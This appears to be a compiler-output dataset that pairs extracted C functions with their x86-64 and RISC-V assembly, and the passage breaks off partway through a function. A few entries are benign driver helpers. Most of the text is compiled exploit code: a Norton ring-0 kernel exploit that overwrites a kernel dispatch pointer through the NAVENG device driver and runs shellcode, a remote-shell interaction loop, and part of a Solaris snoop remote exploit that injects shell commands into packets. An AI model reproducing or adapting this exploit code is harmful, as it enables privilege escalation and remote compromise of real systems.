.file "extr_olpc-xo175-ec.c_olpc_xo175_ec_flush_logbuf_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "got debug string [%*pE]\n" .text .align 1 .type olpc_xo175_ec_flush_logbuf, @function olpc_xo175_ec_flush_logbuf: addi sp,sp,-16 sd s0,0(sp) lw a3,8(a0) mv s0,a0 ld a2,0(a0) ld a0,16(a0) lla a1,.LC0 sd ra,8(sp) call dev_dbg@plt ld ra,8(sp) sd zero,0(s0) ld s0,0(sp) addi sp,sp,16 jr ra .size olpc_xo175_ec_flush_logbuf, .-olpc_xo175_ec_flush_logbuf .globl g_aug_volatile_8171 .data .align 2 .type g_aug_volatile_8171, @object .size g_aug_volatile_8171, 4 g_aug_volatile_8171: .word 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_28763.c_main_aug_v3_4
.file "extr_28763.c_main_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "cls" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "\n################################" .align 8 .LC2: .string "## Norton I.S ##" .align 8 .LC3: .string "## Ring0 Exploit ##" .align 8 .LC4: .string "################################" .align 8 .LC5: .string "\nRuben Santamarta\nwww.reversemode.com\n" .align 8 .LC6: .string "\nusage> exploit.exe <XP> or <2K>" .section .rodata.str1.1 .LC7: .string "psapi.dll" .LC8: .string "EnumDeviceDrivers" .LC9: .string "GetDeviceDriverBaseNameA" .section .rodata.str1.8 .align 8 .LC10: .string "\n[!] Searching Ntoskrnl.exe Base Address..." .section .rodata.str1.1 .LC11: .string "ntoskr" .LC12: .string "[%x] Found!\n" .section .rodata.str1.8 .align 8 .LC13: .string "!!? ntoskrnl.exe base address not found\nexiting\n" .section .rodata.str1.1 .LC14: .string "\\\\.\\NAVENG" .LC15: .string "\n\n** Initializing Exploit]\n" .LC16: .string "INFORMATION " .section .rodata.str1.8 .align 8 .LC17: .string "-----------------------------------------------------" .align 8 .LC18: .string "[!] NAVENG Device Handle [%x]\n" .section .rodata.str1.1 .LC19: .string "XP" .section .rodata.str1.8 .align 8 .LC20: .string "[!] Overwriting NtQuerySystemInformation Switch at [0x%x]\n" .align 8 .LC21: .string "\n\n\t\t[!] Initializing Countdown,last chance to abort." .section .rodata.str1.1 .LC22: .string "\r -[ %d ]- " .LC23: .string "\n\n[*] Executing ShellCode" .LC24: .string "dir" .LC25: .string "\n\n[*] Exploit terminated\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 pushq %r15 pushq %r14 pushq %r13 pushq %r12 pushq %rbx .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 .cfi_offset 3, -56 movl %edi, %ebx subq $856, %rsp movq %rsi, -896(%rbp) movq %rsp, %rcx movq %fs:40, %rax movq %rax, -56(%rbp) xorl %eax, %eax movslq MAX_PATH(%rip), %rax addq $15, %rax movq %rax, %rdx andq $-4096, %rax subq %rax, %rcx andq $-16, %rdx cmpq %rcx, %rsp je .L3 .L25: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rcx, %rsp jne .L25 .L3: andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx jne .L26 .L4: leaq .LC0(%rip), %rdi movl $-1869573940, -61(%rbp) movq %rsp, %r12 movb $0, -57(%rbp) call system@PLT leaq .LC1(%rip), %rdi call puts@PLT leaq .LC2(%rip), %rdi call puts@PLT leaq .LC3(%rip), %rdi call puts@PLT leaq .LC4(%rip), %rdi call puts@PLT leaq .LC5(%rip), %rdi call puts@PLT cmpl $2, %ebx jg .L5 leaq .LC6(%rip), %rdi call puts@PLT movl $1, %edi call exit@PLT .L5: leaq .LC7(%rip), %r13 leaq -864(%rbp), %rbx movq %r13, %rdi call LoadLibrary@PLT leaq .LC8(%rip), %rsi movl %eax, %edi call GetProcAddress@PLT movq %r13, %rdi movq %rax, %r14 call LoadLibrary@PLT leaq .LC9(%rip), %rsi movl %eax, %edi call GetProcAddress@PLT movq %rbx, %rdi movl $800, %esi leaq -868(%rbp), %rdx movq %rax, %r13 call *%r14 movslq -868(%rbp), %r15 xorl %eax, %eax leaq .LC10(%rip), %rdi shrq $2, %r15 movl %r15d, -884(%rbp) call printf@PLT testl %r15d, %r15d js .L6 movq %rbx, %r14 leaq .LC11(%rip), %r15 xorl %ebx, %ebx movl $0, -888(%rbp) jmp .L8 .p2align 4,,10 .p2align 3 .L7: addl $1, %ebx addq $4, %r14 cmpl %ebx, -884(%rbp) jl .L27 .L8: movl MAX_PATH(%rip), %edx movl (%r14), %edi movq %r12, %rsi call *%r13 movl $6, %edx movq %r15, %rsi movq %r12, %rdi call strncmp@PLT testq %rax, %rax jne .L7 movl (%r14), %esi leaq .LC12(%rip), %rdi addl $1, %ebx addq $4, %r14 call printf@PLT movl -4(%r14), %eax movl %eax, -888(%rbp) cmpl %ebx, -884(%rbp) jge .L8 .L27: movl -888(%rbp), %ecx testl %ecx, %ecx je .L6 .L9: subq $8, %rsp xorl %edx, %edx xorl %r9d, %r9d xorl %ecx, %ecx pushq $0 xorl %esi, %esi movl $3, %r8d leaq .LC14(%rip), %rdi call CreateFile@PLT movq %rax, %r12 cmpq %r12, INVALID_HANDLE_VALUE(%rip) popq %rax popq %rdx je .L28 .L10: leaq .LC15(%rip), %rdi call puts@PLT leaq .LC16(%rip), %rdi call puts@PLT leaq .LC17(%rip), %rdi call puts@PLT movq %r12, %rsi leaq .LC18(%rip), %rdi xorl %eax, %eax call printf@PLT movq -896(%rbp), %rax movl $2, %edx leaq .LC19(%rip), %rsi movq 8(%rax), %rdi call strncmp@PLT movl -888(%rbp), %ebx testq %rax, %rax jne .L11 addl WXP_SWITCH(%rip), %ebx .L12: movl %ebx, %esi leaq .LC20(%rip), %rdi xorl %eax, %eax call printf@PLT movl PAGE_EXECUTE_READWRITE(%rip), %ecx movl MEM_COMMIT(%rip), %edx movl $33554432, %edi orl MEM_RESERVE(%rip), %edx movl $61440, %esi call VirtualAlloc@PLT movq %rax, %r13 movl %eax, %edi leaq 4(%rax), %rax leaq 61440(%r13), %rdx .p2align 4,,10 .p2align 3 .L13: movl %edi, (%rax) addq $4, %rax cmpq %rdx, %rax jne .L13 movl $5, %edx leal -61(%rbp), %esi leaq .LC22(%rip), %r15 movl $10, %r14d call memcpy@PLT leaq .LC21(%rip), %rdi xorl %eax, %eax call printf@PLT movl $10, %esi movq %r15, %rdi xorl %eax, %eax call printf@PLT .p2align 4,,10 .p2align 3 .L14: movl $1000, %edi subl $1, %r14d call Sleep@PLT xorl %eax, %eax movl %r14d, %esi movq %r15, %rdi call printf@PLT cmpl $1, %r14d jne .L14 leaq .LC23(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1000, %edi call Sleep@PLT leaq -872(%rbp), %rax pushq $0 xorl %ecx, %ecx pushq %rax xorl %edx, %edx movl $4, %r9d movl %ebx, %r8d movl $2239187, %esi movq %r12, %rdi call DeviceIoControl@PLT leaq .LC24(%rip), %rdi call system@PLT movq %r12, %rdi call CloseHandle@PLT movq %r13, %rdi call free@PLT leaq .LC25(%rip), %rdi call puts@PLT movq -56(%rbp), %rax subq %fs:40, %rax jne .L29 leaq -40(%rbp), %rsp xorl %eax, %eax popq %rbx popq %r12 popq %r13 popq %r14 popq %r15 popq %rbp .cfi_remember_state .cfi_def_cfa 7, 8 ret .L11: .cfi_restore_state addl W2K_SWITCH(%rip), %ebx jmp .L12 .L6: leaq .LC13(%rip), %rdi call puts@PLT xorl %edi, %edi call exit@PLT movl $0, -888(%rbp) jmp .L9 .L28: xorl %eax, %eax call ShowError@PLT jmp .L10 .L26: orq $0, -8(%rsp,%rdx) jmp .L4 .L29: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl WXP_SWITCH .bss .align 4 .type WXP_SWITCH, @object .size WXP_SWITCH, 4 WXP_SWITCH: .zero 4 .globl W2K_SWITCH .align 4 .type W2K_SWITCH, @object .size W2K_SWITCH, 4 W2K_SWITCH: .zero 4 .globl PAGE_EXECUTE_READWRITE .align 4 .type PAGE_EXECUTE_READWRITE, @object .size PAGE_EXECUTE_READWRITE, 4 PAGE_EXECUTE_READWRITE: .zero 4 .globl MEM_RESERVE .align 4 .type MEM_RESERVE, @object .size MEM_RESERVE, 4 MEM_RESERVE: .zero 4 .globl MEM_COMMIT .align 4 .type MEM_COMMIT, @object .size MEM_COMMIT, 4 MEM_COMMIT: .zero 4 .globl MAX_PATH .align 4 .type MAX_PATH, @object .size MAX_PATH, 4 MAX_PATH: .zero 4 .globl INVALID_HANDLE_VALUE .align 8 .type INVALID_HANDLE_VALUE, @object .size INVALID_HANDLE_VALUE, 8 INVALID_HANDLE_VALUE: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_28763.c_main_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "cls" .align 3 .LC1: .string "\n################################" .align 3 .LC2: .string "## Norton I.S ##" .align 3 .LC3: .string "## Ring0 Exploit ##" .align 3 .LC4: .string "################################" .align 3 .LC5: .string "\nRuben Santamarta\nwww.reversemode.com\n" .align 3 .LC6: .string "\nusage> exploit.exe <XP> or <2K>" .align 3 .LC7: .string "psapi.dll" .align 3 .LC8: .string "EnumDeviceDrivers" .align 3 .LC9: .string "GetDeviceDriverBaseNameA" .align 3 .LC10: .string "\n[!] Searching Ntoskrnl.exe Base Address..." .align 3 .LC11: .string "ntoskr" .align 3 .LC12: .string "[%x] Found!\n" .align 3 .LC13: .string "!!? ntoskrnl.exe base address not found\nexiting\n" .align 3 .LC14: .string "\\\\.\\NAVENG" .align 3 .LC15: .string "\n\n** Initializing Exploit]\n" .align 3 .LC16: .string "INFORMATION " .align 3 .LC17: .string "-----------------------------------------------------" .align 3 .LC18: .string "[!] NAVENG Device Handle [%x]\n" .align 3 .LC19: .string "XP" .align 3 .LC20: .string "[!] Overwriting NtQuerySystemInformation Switch at [0x%x]\n" .align 3 .LC21: .string "\n\n\t\t[!] Initializing Countdown,last chance to abort." .align 3 .LC22: .string "\r -[ %d ]- " .align 3 .LC23: .string "\n\n[*] Executing ShellCode" .align 3 .LC24: .string "dir" .align 3 .LC25: .string "\n\n[*] Exploit terminated\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-944 sd ra,936(sp) sd s0,928(sp) sd s1,920(sp) addi s0,sp,944 sd s3,904(sp) sd s4,896(sp) sd s5,888(sp) sd s10,848(sp) sd s2,912(sp) sd s6,880(sp) sd s7,872(sp) sd s8,864(sp) sd s9,856(sp) sd s11,840(sp) lla s4,.LANCHOR0 lw a5,0(s4) la s5,__stack_chk_guard mv s1,a0 addi a5,a5,15 andi a5,a5,-16 sub sp,sp,a5 ld a5, 0(s5) sd a5, -120(s0) li a5, 0 li a5,-1869574144 addi a5,a5,204 lla a0,.LC0 sw a5,-128(s0) mv s10,a1 sb zero,-124(s0) call system@plt lla a0,.LC1 call puts@plt lla a0,.LC2 call puts@plt lla a0,.LC3 call puts@plt lla a0,.LC4 call puts@plt lla a0,.LC5 call puts@plt li a5,2 mv s3,sp ble s1,a5,.L19 .L2: lla a0,.LC7 call LoadLibrary@plt lla a1,.LC8 call GetProcAddress@plt mv s2,a0 lla a0,.LC7 call LoadLibrary@plt lla a1,.LC9 call GetProcAddress@plt addi s1,s0,-928 mv s7,a0 addi a2,s0,-932 li a1,800 mv a0,s1 jalr s2 lw s6,-932(s0) lla a0,.LC10 srai s6,s6,2 call printf@plt blt s6,zero,.L3 li s9,0 li s2,0 lla s8,.LC11 lla s11,.LC12 j .L5 .L4: addiw s2,s2,1 addi s1,s1,4 blt s6,s2,.L20 .L5: lw a2,0(s4) lw a0,0(s1) mv a1,s3 jalr s7 li a2,6 mv a1,s8 mv a0,s3 call strncmp@plt bne a0,zero,.L4 lw a1,0(s1) mv a0,s11 addiw s2,s2,1 call printf@plt addi s1,s1,4 lw s9,-4(s1) bge s6,s2,.L5 .L20: beq s9,zero,.L3 .L6: li a5,0 li a6,0 li a4,3 li a3,0 li a2,0 li a1,0 lla a0,.LC14 call CreateFile@plt ld a5,8(s4) mv s3,a0 beq a5,a0,.L21 .L7: lla a0,.LC15 call puts@plt lla a0,.LC16 call puts@plt lla a0,.LC17 call puts@plt mv a1,s3 lla a0,.LC18 call printf@plt ld a0,8(s10) li a2,2 lla a1,.LC19 call strncmp@plt bne a0,zero,.L8 lw s6,16(s4) addw s6,s6,s9 .L9: mv a1,s6 lla a0,.LC20 call printf@plt lw a5,32(s4) lw a2,28(s4) lw a3,24(s4) li a1,61440 or a2,a2,a5 li a0,33554432 call VirtualAlloc@plt mv s7,a0 li a4,61440 sext.w a0,a0 addi a5,s7,4 add a4,s7,a4 .L10: sw a0,0(a5) addi a5,a5,4 bne a5,a4,.L10 addi a5,s0,-112 addiw a1,a5,-16 li a2,5 call memcpy@plt lla a0,.LC21 call printf@plt li a1,10 lla a0,.LC22 call printf@plt li s1,10 lla s4,.LC22 li s2,1 .L11: li a0,1000 call Sleep@plt addiw s1,s1,-1 mv a1,s1 mv a0,s4 call printf@plt bne s1,s2,.L11 lla a0,.LC23 call printf@plt li a0,1000 call Sleep@plt li a1,2240512 li a5,4 mv a4,s6 li a7,0 addi a6,s0,-936 li a3,0 li a2,0 addi a1,a1,-1325 mv a0,s3 call DeviceIoControl@plt lla a0,.LC24 call system@plt mv a0,s3 call CloseHandle@plt mv a0,s7 call free@plt lla a0,.LC25 call puts@plt ld a4, -120(s0) ld a5, 0(s5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L22 addi sp,s0,-944 ld ra,936(sp) ld s0,928(sp) ld s1,920(sp) ld s2,912(sp) ld s3,904(sp) ld s4,896(sp) ld s5,888(sp) ld s6,880(sp) ld s7,872(sp) ld s8,864(sp) ld s9,856(sp) ld s10,848(sp) ld s11,840(sp) li a0,0 addi sp,sp,944 jr ra .L8: lw s6,20(s4) addw s6,s6,s9 j .L9 .L19: lla a0,.LC6 call puts@plt li a0,1 call exit@plt j .L2 .L3: lla a0,.LC13 call puts@plt li a0,0 call exit@plt li s9,0 j .L6 .L21: call ShowError@plt j .L7 .L22: call __stack_chk_fail@plt .size main, .-main .globl WXP_SWITCH .globl W2K_SWITCH .globl PAGE_EXECUTE_READWRITE .globl MEM_RESERVE .globl MEM_COMMIT .globl MAX_PATH .globl INVALID_HANDLE_VALUE .bss .align 3 .set .LANCHOR0,. + 0 .type MAX_PATH, @object .size MAX_PATH, 4 MAX_PATH: .zero 4 .zero 4 .type INVALID_HANDLE_VALUE, @object .size INVALID_HANDLE_VALUE, 8 INVALID_HANDLE_VALUE: .zero 8 .type WXP_SWITCH, @object .size WXP_SWITCH, 4 WXP_SWITCH: .zero 4 .type W2K_SWITCH, @object .size W2K_SWITCH, 4 W2K_SWITCH: .zero 4 .type PAGE_EXECUTE_READWRITE, @object .size PAGE_EXECUTE_READWRITE, 4 PAGE_EXECUTE_READWRITE: .zero 4 .type MEM_COMMIT, @object .size MEM_COMMIT, 4 MEM_COMMIT: .zero 4 .type MEM_RESERVE, @object .size MEM_RESERVE, 4 MEM_RESERVE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_elantech.c_elantech_packet_dump_aug_v3_6
.file "extr_elantech.c_elantech_packet_dump_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "PS/2 packet [%*ph]\n" .text .p2align 4 .type elantech_packet_dump, @function elantech_packet_dump: .LFB24: .cfi_startproc endbr64 movl 4(%rdi), %ecx movl (%rdi), %r8d movq %rdi, %rsi leaq .LC0(%rip), %rdx movl KERN_DEBUG(%rip), %edi jmp psmouse_printk@PLT .cfi_endproc .LFE24: .size elantech_packet_dump, .-elantech_packet_dump .globl KERN_DEBUG .bss .align 4 .type KERN_DEBUG, @object .size KERN_DEBUG, 4 KERN_DEBUG: .zero 4 .globl g_aug_volatile_5668 .align 4 .type g_aug_volatile_5668, @object .size g_aug_volatile_5668, 4 g_aug_volatile_5668: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_elantech.c_elantech_packet_dump_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "PS/2 packet [%*ph]\n" .text .align 1 .type elantech_packet_dump, @function elantech_packet_dump: lw a4,0(a0) lw a3,4(a0) mv a1,a0 lla a2,.LC0 lw a0,.LANCHOR0 tail psmouse_printk@plt .size elantech_packet_dump, .-elantech_packet_dump .globl KERN_DEBUG .globl g_aug_volatile_5668 .bss .align 2 .set .LANCHOR0,. + 0 .type KERN_DEBUG, @object .size KERN_DEBUG, 4 KERN_DEBUG: .zero 4 .type g_aug_volatile_5668, @object .size g_aug_volatile_5668, 4 g_aug_volatile_5668: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_22974.c_conn_shell_aug_v3_6
.file "extr_22974.c_conn_shell_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string " [*] Send, command packet !\n\n" .LC1: .string "%s" .LC2: .string "exit" .text .p2align 4 .globl conn_shell .type conn_shell, @function conn_shell: .LFB1: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 pushq %r15 pushq %r14 pushq %r13 pushq %r12 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 movl %edi, %r12d pushq %rbx subq $40, %rsp .cfi_offset 3, -56 movq DEF_COMM(%rip), %r14 movq %fs:40, %rax movq %rax, -56(%rbp) movl NRL(%rip), %eax movq %rsp, %rcx movl %eax, -72(%rbp) movslq GET_R(%rip), %rax movq %rax, %r15 addq $15, %rax movq %rax, %rdx andq $-4096, %rax subq %rax, %rcx andq $-16, %rdx cmpq %rcx, %rsp je .L3 .L27: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rcx, %rsp jne .L27 .L3: andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx jne .L28 .L4: movl -72(%rbp), %esi movl %r15d, %edx movq %rsp, %rdi movq %rsp, %r13 subl $1, %r15d call memset@PLT movl stdout(%rip), %edi leaq .LC0(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl NRL(%rip), %ebx movq %r14, %rdi call strlen@PLT movq %r14, %rsi movl %r12d, %edi leal 1(%r12), %r14d movl %ebx, %ecx movl %eax, %edx leaq -60(%rbp), %rbx call send@PLT .p2align 4,,10 .p2align 3 .L8: movl stdout(%rip), %edi call fflush@PLT movq %rbx, %rdi call FD_ZERO@PLT movq %rbx, %rsi movl %r12d, %edi call FD_SET@PLT movl STDIN_FILENO(%rip), %edi movq %rbx, %rsi call FD_SET@PLT xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %r14d, %edi call select@PLT movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L5 movl %r15d, %edx movl %r12d, %edi movq %r13, %rsi call read@PLT movl NRL(%rip), %edi movslq %eax, %rdx cmpl %edx, %edi jl .L6 movl -72(%rbp), %eax movl %edx, -68(%rbp) testl %eax, %eax je .L24 call exit@PLT movl NRL(%rip), %edi movslq -68(%rbp), %rdx .L6: movb %dil, 0(%r13,%rdx) movl stdout(%rip), %edi movq %r13, %rdx xorl %eax, %eax leaq .LC1(%rip), %rsi call fprintf@PLT .L5: movl STDIN_FILENO(%rip), %edi movq %rbx, %rsi call FD_ISSET@PLT testq %rax, %rax je .L8 movl STDIN_FILENO(%rip), %edi movl %r15d, %edx movq %r13, %rsi call read@PLT movl %eax, %edx movl NRL(%rip), %eax cmpl %edx, %eax jge .L8 movslq %edx, %rcx movq %r13, %rdi leaq .LC2(%rip), %rsi movl %edx, -68(%rbp) movb %al, 0(%r13,%rcx) call strstr@PLT movl -68(%rbp), %edx movq %r13, %rsi movl %r12d, %edi testq %rax, %rax movl -72(%rbp), %eax cmovne SCS(%rip), %eax movl %eax, -72(%rbp) call write@PLT jmp .L8 .p2align 4,,10 .p2align 3 .L24: movq -56(%rbp), %rax subq %fs:40, %rax jne .L29 leaq -40(%rbp), %rsp popq %rbx popq %r12 popq %r13 popq %r14 popq %r15 popq %rbp .cfi_remember_state .cfi_def_cfa 7, 8 ret .L28: .cfi_restore_state orq $0, -8(%rsp,%rdx) jmp .L4 .L29: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size conn_shell, .-conn_shell .globl stdout .bss .align 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .globl STDIN_FILENO .align 4 .type STDIN_FILENO, @object .size STDIN_FILENO, 4 STDIN_FILENO: .zero 4 .globl SCS .align 4 .type SCS, @object .size SCS, 4 SCS: .zero 4 .globl NRL .align 4 .type NRL, @object .size NRL, 4 NRL: .zero 4 .globl GET_R .align 4 .type GET_R, @object .size GET_R, 4 GET_R: .zero 4 .globl DEF_COMM .align 8 .type DEF_COMM, @object .size DEF_COMM, 8 DEF_COMM: .zero 8 .globl g_aug_volatile_5800 .data .align 4 .type g_aug_volatile_5800, @object .size g_aug_volatile_5800, 4 g_aug_volatile_5800: .long 9 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_22974.c_conn_shell_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string " [*] Send, command packet !\n\n" .align 3 .LC1: .string "%s" .align 3 .LC2: .string "exit" .text .align 1 .globl conn_shell .type conn_shell, @function conn_shell: addi sp,sp,-128 sd ra,120(sp) sd s0,112(sp) sd s1,104(sp) addi s0,sp,128 sd s2,96(sp) sd s4,80(sp) sd s5,72(sp) sd s6,64(sp) sd s7,56(sp) sd s8,48(sp) sd s9,40(sp) sd s10,32(sp) sd s11,24(sp) sd s3,88(sp) lla s2,.LANCHOR0 lw s7,16(s2) lw s9,0(s2) la s10,__stack_chk_guard addi a5,s7,15 andi a5,a5,-16 sub sp,sp,a5 mv a2,s7 ld a5, 0(s10) sd a5, -120(s0) li a5, 0 mv s4,a0 mv a1,s9 mv a0,sp ld s1,8(s2) call memset@plt lw a0,20(s2) lla a1,.LC0 mv s5,sp call fprintf@plt mv a0,s1 call strlen@plt lw a3,0(s2) mv a2,a0 mv a1,s1 mv a0,s4 call send@plt addiw s6,s4,1 addiw s7,s7,-1 addi s1,s0,-124 lla s8,.LC1 lla s11,.LC2 .L5: lw a0,20(s2) call fflush@plt mv a0,s1 call FD_ZERO@plt mv a1,s1 mv a0,s4 call FD_SET@plt lw a0,24(s2) mv a1,s1 call FD_SET@plt mv a1,s1 li a4,0 li a3,0 li a2,0 mv a0,s6 call select@plt mv a1,s1 mv a0,s4 call FD_ISSET@plt beq a0,zero,.L2 mv a2,s7 mv a1,s5 mv a0,s4 call read@plt lw a5,0(s2) mv s3,a0 blt a5,a0,.L3 beq s9,zero,.L19 mv a0,a5 call exit@plt lw a5,0(s2) .L3: lw a0,20(s2) add s3,s5,s3 mv a2,s5 mv a1,s8 sb a5,0(s3) call fprintf@plt .L2: lw a0,24(s2) mv a1,s1 call FD_ISSET@plt beq a0,zero,.L5 lw a0,24(s2) mv a2,s7 mv a1,s5 call read@plt lw a5,0(s2) mv s3,a0 bge a5,a0,.L5 add a4,s5,a0 mv a1,s11 mv a0,s5 sb a5,0(a4) call strstr@plt beq a0,zero,.L7 lw s9,28(s2) .L7: mv a2,s3 mv a1,s5 mv a0,s4 call write@plt j .L5 .L19: ld a4, -120(s0) ld a5, 0(s10) xor a5, a4, a5 li a4, 0 bne a5,zero,.L22 addi sp,s0,-128 ld ra,120(sp) ld s0,112(sp) ld s1,104(sp) ld s2,96(sp) ld s3,88(sp) ld s4,80(sp) ld s5,72(sp) ld s6,64(sp) ld s7,56(sp) ld s8,48(sp) ld s9,40(sp) ld s10,32(sp) ld s11,24(sp) addi sp,sp,128 jr ra .L22: call __stack_chk_fail@plt .size conn_shell, .-conn_shell .globl stdout .globl STDIN_FILENO .globl SCS .globl NRL .globl GET_R .globl DEF_COMM .globl g_aug_volatile_5800 .data .align 2 .type g_aug_volatile_5800, @object .size g_aug_volatile_5800, 4 g_aug_volatile_5800: .word 9 .bss .align 3 .set .LANCHOR0,. + 0 .type NRL, @object .size NRL, 4 NRL: .zero 4 .zero 4 .type DEF_COMM, @object .size DEF_COMM, 8 DEF_COMM: .zero 8 .type GET_R, @object .size GET_R, 4 GET_R: .zero 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .type STDIN_FILENO, @object .size STDIN_FILENO, 4 STDIN_FILENO: .zero 4 .type SCS, @object .size SCS, 4 SCS: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_6328.c_main_aug_v3_5
.file "extr_6328.c_main_aug_v3_5.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "uname -a > /tmp/.patch.your.system.txt" .align 8 .LC1: .string "hoagie_snoop.c - solaris snoop remote\n-andi / void.at\n" .align 8 .LC2: .string "[*] unknown command line option '%c'\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC3: .string "hvt:p:r:i:c:" .section .rodata.str1.8 .align 8 .LC4: .string "[*] failed to create raw socket" .align 8 .LC5: .string "[*] attacking '%s' on '%s' ...\n" .section .rodata.str1.1 .LC6: .string ";%s;" .LC7: .string "[*] execute '%s' now ...\n" .LC8: .string "[*] done" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 xorl %r14d, %r14d pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movq %rsi, %r12 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %edi, %ebp leaq .LC1(%rip), %rdi pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 leaq .LC3(%rip), %rbx subq $1080, %rsp .cfi_def_cfa_offset 1136 movq SMB_TARGET_DEFAULT(%rip), %r15 movl SMB_PORT_DEFAULT(%rip), %r13d movq %fs:40, %rax movq %rax, 1064(%rsp) movl g_aug_volatile_5575(%rip), %eax addl $1, %eax movl %eax, g_aug_volatile_5575(%rip) call puts@PLT movl $0, 12(%rsp) cmpl $1, %ebp jle .L20 .p2align 4,,10 .p2align 3 .L2: movq %rbx, %rdx movq %r12, %rsi movl %ebp, %edi call getopt@PLT cmpb %al, EOF(%rip) je .L3 cmpb $112, %al je .L4 jg .L5 cmpb $99, %al je .L6 cmpb $105, %al jne .L8 movq optarg(%rip), %rdi call atoi@PLT movl %eax, 12(%rsp) jmp .L2 .p2align 4,,10 .p2align 3 .L5: cmpb $116, %al jne .L8 movq optarg(%rip), %r15 jmp .L2 .p2align 4,,10 .p2align 3 .L4: movq optarg(%rip), %rdi call atoi@PLT movl %eax, %r13d jmp .L2 .p2align 4,,10 .p2align 3 .L8: movsbl %al, %esi leaq .LC2(%rip), %rdi xorl %eax, %eax call printf@PLT movl $-1, %edi call exit@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L6: movq optarg(%rip), %r14 jmp .L2 .L20: movq %r12, %rsi movl %ebp, %edi call usage@PLT .L3: movl IPPROTO_TCP(%rip), %edx movl SOCK_RAW(%rip), %esi movl PF_INET(%rip), %edi call socket@PLT movl %eax, %ebp cmpl $-1, %eax je .L21 movl AF_INET(%rip), %eax movl %r13d, %edi movl %eax, 28(%rsp) call htons@PLT movq %r15, %rdi movl %eax, 24(%rsp) call inet_addr@PLT movl %eax, 20(%rsp) testq %r14, %r14 je .L22 .L13: movslq 12(%rsp), %rbx movq %r15, %rdx movq targets(%rip), %rax leaq .LC5(%rip), %rdi leaq 32(%rsp), %r12 salq $4, %rbx movq (%rax,%rbx), %rsi xorl %eax, %eax call printf@PLT movq %r12, %rdi movq %r14, %rcx movl $1024, %esi leaq .LC6(%rip), %rdx call snprintf@PLT movq %r12, %rdi call strlen@PLT cmpl $255, %eax jg .L14 movl $256, %edx movsbl SMB_HEADER_FILLER(%rip), %esi subl %eax, %edx cltq leaq (%r12,%rax), %rdi call memset@PLT movl $256, %eax .L14: movzbl SMB_HEADER_FILLER(%rip), %edx movslq %eax, %rcx addq targets(%rip), %rbx movq %r14, %rsi leaq .LC7(%rip), %rdi movb %dl, 32(%rsp,%rcx) 